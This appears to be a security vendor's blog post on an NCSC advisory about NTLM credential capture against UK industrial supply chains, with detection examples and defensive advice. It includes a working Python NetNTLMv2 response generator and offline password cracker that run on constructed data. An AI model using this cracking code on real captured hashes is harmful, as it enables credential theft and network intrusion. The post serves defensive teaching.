NCSC’s latest advisory further highlights the importance of securing supply chains
The NCSC advisory on compromises to UK organisations in the engineering and Industrial Control System (ICS) environments by hostile state actors gives details of an ongoing campaign which has targeted the Critical National Infrastructure (CNI) supply chain since March 2017.
Rather than the emphasis being on a particular vulnerability or attack vector, details have been given of an attack campaign in which the attacker uses a multi-vector methodology to compromise their target. The end result is the attacker being able to obtain NTLM (NT LAN Manager, Microsoft's challenge-response authentication protocol) credentials.
What’s the problem?
In this particular instance, watering holes and spear phishing attacks are used in conjunction with Inveigh (a PowerShell LLMNR/NBNS spoofer and man-in-the-middle tool written to assist penetration testers). The attacker is thereby able to capture the NTLM challenge-response hashes (NetNTLM) that the target's users send when their machines try to authenticate to attacker-controlled infrastructure.
These hashes can then be relayed to parts of the network that accept NTLM authentication without signing (for example hosts where SMB signing is not enforced), or cracked offline so that the actual user credentials can be recovered and used to access the network remotely via Remote Desktop Protocol (RDP) or VPN.
In other words, it gives the attacker the login details required to access the environment, after which they can drop malware or move around the network to achieve their objectives.
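To make the offline-cracking step concrete, here is an added worked example that is not part of the NCSC advisory or XQ Cyber's material: it computes the NetNTLMv2 response a Windows client sends to a rogue SMB listener (the line a tool like Inveigh records), then runs a dictionary attack against that capture. The user name, domain, challenges, blob contents and password are all constructed for the example; the NTLMv2 algorithm (NT hash = MD4 of the UTF-16LE password, NTLMv2 key = HMAC-MD5 over the upper-cased user plus domain, NTProofStr = HMAC-MD5 over server challenge plus client blob) is the real one.

```python
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Spelled out because OpenSSL 3 ships MD4 only as a
    'legacy' algorithm, so hashlib.new('md4') is often unavailable."""
    mask = 0xFFFFFFFF

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, k, shifts, order in rounds:
            for i in range(16):
                dst = (-i) % 4  # registers are updated in the order a, d, c, b
                v = r[dst] + fn(r[(dst + 1) % 4], r[(dst + 2) % 4], r[(dst + 3) % 4]) + x[order[i]] + k
                r[dst] = rotl(v & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); NTLMv2 is keyed from this."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def build_blob(client_challenge: bytes, target_info: bytes, filetime: int) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE structure the client appends to its response."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def net_ntlmv2_response(password, user, domain, server_challenge: bytes, blob: bytes) -> str:
    """What the victim's machine sends to the rogue SMB server, in the hashcat-style line
    that capture tools log: user::domain:server_challenge:NTProofStr:blob."""
    proof = hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, "md5").digest()
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_net_ntlmv2(captured: str, wordlist):
    """Offline dictionary attack: everything except the password is in the capture, so
    each guess costs one MD4 and two HMAC-MD5s and never touches the victim's network."""
    user, _, domain, chal_hex, proof_hex, blob_hex = captured.split(":")
    challenge, blob = bytes.fromhex(chal_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        guess = hmac.new(ntlmv2_key(candidate, user, domain), challenge + blob, "md5").hexdigest()
        if guess == proof_hex:
            return candidate
    return None


# Constructed capture: user "j.smith" in domain "CORP" follows a file:// link planted on a
# watering-hole page; Windows authenticates to the attacker's listener, which chose the
# server challenge. None of these values come from a real incident.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
TARGET_INFO = b"\x02\x00\x08\x00" + "CORP".encode("utf-16le")  # AvPair: NbDomainName
BLOB = build_blob(bytes.fromhex("a1b2c3d4e5f60718"), TARGET_INFO, 0x01D3C7A8E1F00000)
CAPTURED = net_ntlmv2_response("Winter2018!", "j.smith", "CORP", SERVER_CHALLENGE, BLOB)
WORDLIST = ["password", "Password1", "Summer2017", "Winter2018!", "letmein"]

if __name__ == "__main__":
    print(CAPTURED)
    print("cracked:", crack_net_ntlmv2(CAPTURED, WORDLIST))
```

The point to take from this is that nothing in the captured line is secret except the password: the server challenge was chosen by the attacker, the blob is sent in clear, so the only thing limiting the attacker is password strength and their hardware. Long, unique passwords and disabling NTLM where possible are the mitigations; the capture itself cannot be "revoked".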
There is a significant risk to the engineering and industrial control system sector companies, but these are also issues that could affect any other sector or organisation regardless of size.
At XQ Cyber we believe it is important to understand and implement security measures across your environment which, through good security practice, lessen the risk from such campaigns. A sophisticated or hostile attacker will often use several attack vectors to penetrate and compromise their target. The approach to security therefore has to be holistic across the board, as the focus may not be on just a single vulnerability or vector. The following 5 steps outline areas which could bolster your security posture and assist in alerting you to the presence of suspicious activity against your organisation.
Monitoring of network traffic
In this campaign, the attackers compromised the websites of trusted third parties in what is known as a watering hole attack. These compromised websites would then be visited by the target organisation as part of the usual business practices, serving as an indirect way to compromise the target.
In order to know what suspicious or malicious network traffic looks like, an organisation should first establish what its 'normal' state is. A baseline of which internal hosts talk to which external destinations, and over which ports, also makes anomaly detection possible: traffic to previously unseen or known-malicious infrastructure, or SMB authentication attempts leaving the network (the mechanism behind the NTLM capture in this campaign), then stand out.
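As an added illustration (not code from the advisory or from XQ Cyber), the following builds a baseline of external destinations from a learning window of flow records and then flags two things in later traffic: outbound SMB/NetBIOS connections to non-RFC 1918 addresses, which is what a watering-hole NTLM capture looks like on the wire, and first contact with destinations never seen before. The flow records, addresses and timestamps are constructed; real deployments would read them from firewall, NetFlow or proxy logs.

```python
import ipaddress

# RFC 1918 ranges we treat as "inside". Defined explicitly rather than via
# ip_address().is_private, which also classes the documentation ranges used below as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports on which a browser-triggered NTLM authentication leaves the network.
NTLM_CAPTURE_PORTS = {445, 139, 137}  # SMB, NetBIOS session, NetBIOS name service

# Constructed flow records (timestamp, src_ip, dst_ip, dst_port). Destinations use the
# documentation ranges (203.0.113.0/24 etc.); nothing here is from a real network.
LEARNING_FLOWS = [
    ("2018-03-05T09:01:00", "10.20.1.15", "203.0.113.40", 443),  # engineering vendor's portal
    ("2018-03-05T09:02:10", "10.20.1.15", "10.20.0.5", 445),     # internal file server
    ("2018-03-05T11:30:00", "10.20.1.22", "203.0.113.40", 443),
    ("2018-03-06T08:55:00", "10.20.1.22", "203.0.113.88", 443),  # hosted e-mail
]
NEW_FLOWS = [
    ("2018-03-12T09:01:00", "10.20.1.15", "203.0.113.40", 443),   # same vendor portal, now compromised
    ("2018-03-12T09:01:04", "10.20.1.15", "198.51.100.77", 445),  # page embeds file://198.51.100.77/share/img.png
    ("2018-03-12T09:30:00", "10.20.1.22", "192.0.2.9", 443),      # destination never seen before
    ("2018-03-12T09:31:00", "10.20.1.22", "10.20.0.5", 445),      # normal internal SMB
]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def build_baseline(flows):
    """The set of external (destination, port) pairs seen during the learning window."""
    return {(dst, port) for _, _, dst, port in flows if not is_internal(dst)}


def find_anomalies(flows, baseline):
    """Return (severity, timestamp, src, reason) for flows that break the baseline."""
    alerts = []
    for ts, src, dst, port in flows:
        if is_internal(dst):
            continue  # internal SMB and NetBIOS are normal; only egress is interesting here
        if port in NTLM_CAPTURE_PORTS:
            alerts.append(("high", ts, src, f"outbound port {port} to {dst}: possible NTLM hash capture"))
        elif (dst, port) not in baseline:
            alerts.append(("medium", ts, src, f"first contact with {dst}:{port}"))
    return alerts


if __name__ == "__main__":
    for alert in find_anomalies(NEW_FLOWS, build_baseline(LEARNING_FLOWS)):
        print(*alert)
```

Note that the compromised vendor portal itself raises nothing: it is in the baseline, which is exactly why watering holes work. What gives the attack away is the SMB connection that follows it, and the simplest preventive control is to block ports 137, 139 and 445 outbound at the perimeter so that the hash is never sent.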
Spear phishing the target organisation
Much has been said and written on phishing attacks, but it is one area that always seems to trip up organisations and users (and will likely continue to do so). Well crafted, sophisticated phishing emails can be difficult to spot, but there are signs of an email not being legitimate.
Users, however, are not always aware of how to spot the difference. It is therefore imperative that awareness amongst users is raised on phishing emails and that they are encouraged to report anything that might be suspicious to them, even if they have already clicked on the link or opened the attachments!
User privileges and access control
There are many security controls and restrictions on user access rights that can be applied to user accounts in order to stop the execution of malicious code. A balance has to be struck between usability, productivity, and the necessity to secure the system environment.
Regular security audits should bring such issues to light, and they should be addressed by giving users the least privilege required for their role. Do all users really need to be able to execute PowerShell scripts or run Office macros? The answer could be 'yes', in which case that risk needs to be managed, but more often than not it's a 'no' and only certain users need it.
Once an attacker has gained a foothold in your network, their priority will be to maintain persistence, enumerate the network and move laterally. Knowing what is in your domain and where anomalous accounts appear will help you to identify behaviour that is out of the ordinary. If no one authorised another Domain Admin account but one appears overnight, alarm bells should start ringing. Having the policies and procedures in place to deal with such events will help your incident response preparedness.
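The "Domain Admin appeared overnight" check above can be automated from the Security log. The following is an added example, not code from the advisory or from XQ Cyber: it reads group-membership-change events (IDs 4728, 4732 and 4756, which Windows raises when a member is added to a global, local or universal security group), keeps only privileged groups, drops any addition that matches an approved change record, and notes when the remaining ones happened outside business hours. The event records, account names and change tickets are constructed; in practice the events would come from a SIEM or `Get-WinEvent` export.

```python
from datetime import datetime

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
# Security-log event IDs for "a member was added to a security-enabled group":
# 4728 global (Domain Admins), 4732 local (Administrators), 4756 universal.
GROUP_ADD_EVENTS = {4728, 4732, 4756}

# Constructed Security-log records using the 4728 field names. Not from a real domain.
EVENTS = [
    {"EventID": 4728, "TimeCreated": "2018-03-10T14:02:11", "SubjectUserName": "it.helpdesk",
     "MemberName": "CN=Jane Doe,OU=IT,DC=corp,DC=local", "TargetUserName": "Domain Admins"},
    {"EventID": 4624, "TimeCreated": "2018-03-11T02:40:07", "SubjectUserName": "-",
     "TargetUserName": "j.smith"},  # logon event, ignored by the check
    {"EventID": 4728, "TimeCreated": "2018-03-11T02:47:53", "SubjectUserName": "j.smith",
     "MemberName": "CN=svc-backup,OU=Service Accounts,DC=corp,DC=local", "TargetUserName": "Domain Admins"},
    {"EventID": 4728, "TimeCreated": "2018-03-11T10:15:00", "SubjectUserName": "it.helpdesk",
     "MemberName": "CN=Bob Roe,OU=Sales,DC=corp,DC=local", "TargetUserName": "Sales"},
]

# Constructed change-control records: the only additions anyone signed off.
APPROVED_CHANGES = [
    {"member": "CN=Jane Doe,OU=IT,DC=corp,DC=local", "group": "Domain Admins",
     "by": "it.helpdesk", "ticket": "CHG-1042"},
]


def unapproved_privileged_additions(events, approved, business_hours=(8, 18)):
    """Flag additions to privileged groups with no matching change record, noting
    whether they also happened outside business hours (the 'appeared overnight' case)."""
    approved_keys = {(a["member"], a["group"], a["by"]) for a in approved}
    alerts = []
    for e in events:
        if e["EventID"] not in GROUP_ADD_EVENTS or e["TargetUserName"] not in PRIVILEGED_GROUPS:
            continue
        key = (e["MemberName"], e["TargetUserName"], e["SubjectUserName"])
        if key in approved_keys:
            continue
        reasons = ["no matching change record"]
        hour = datetime.fromisoformat(e["TimeCreated"]).hour
        if not business_hours[0] <= hour < business_hours[1]:
            reasons.append("outside business hours")
        alerts.append({"when": e["TimeCreated"], "group": e["TargetUserName"],
                       "member": e["MemberName"], "by": e["SubjectUserName"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in unapproved_privileged_additions(EVENTS, APPROVED_CHANGES):
        print(alert)
```

Matching on who performed the change as well as what changed matters: in this campaign the attacker holds a legitimate user's credentials, so the addition is made by a real account, and only the absence of a change record (and the 02:47 timestamp) distinguishes it from routine administration.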
Detection and Response
Sophisticated attackers who want to maintain a persistent presence on a network will almost always try to blend in and stay under the radar. An organisation's detection tools and strategy are vital to ensure oversight of the network environment and comparison against a known good baseline. There is no silver bullet here; at times this will simply not give enough warning of an attacker who has slipped through your net. This is where well-rehearsed incident response planning comes into effect.
If the first time different teams and senior members of your organisation get together to battle an attack is during a live critical incident, you are already starting on the back foot and have handed the advantage to an attacker who can run and hide. Incident response exercising and preparedness is critical to how an organisation will emerge out of the other side of a major incident, and it is an activity that should not be put off.
Securing the Supply Chain
Ensuring that all links in a supply chain are secure is vital. In the case of the CNI supply chain, this is doubly important. With hundreds of organisations being a part of the chain there are many routes a hacker could attempt to take in order to reach their true objective. Often smaller members of the chain lack the security budgets and resources of their larger partners, making them enticing targets.
How can XQ Cyber help?
CyberScore™ can help secure supply chains as it quantifies risks by automatically testing and rating the security of all parts of the chain. It peer-rates suppliers based on objective, empirical data and provides in-depth guidance and support to the supply chain members that are most at risk.
XQ Cyber can also help you and your organisation with Incident Management and Incident Response Preparedness. We can assist in working with your team and across your organisation to ensure responses are well rehearsed and exercised, so that when the inevitable does happen your organisation is in a much better place to execute its response plans and lessen the technical, reputational and financial harm.
For further reading visit –
Want to learn more about how CyberScore™ can help secure your business? Visit our website at www.xqcyber.com/cyberscore and if you want to give yourself the very best protection against cyber security threats try our CyberScore™ software for free now.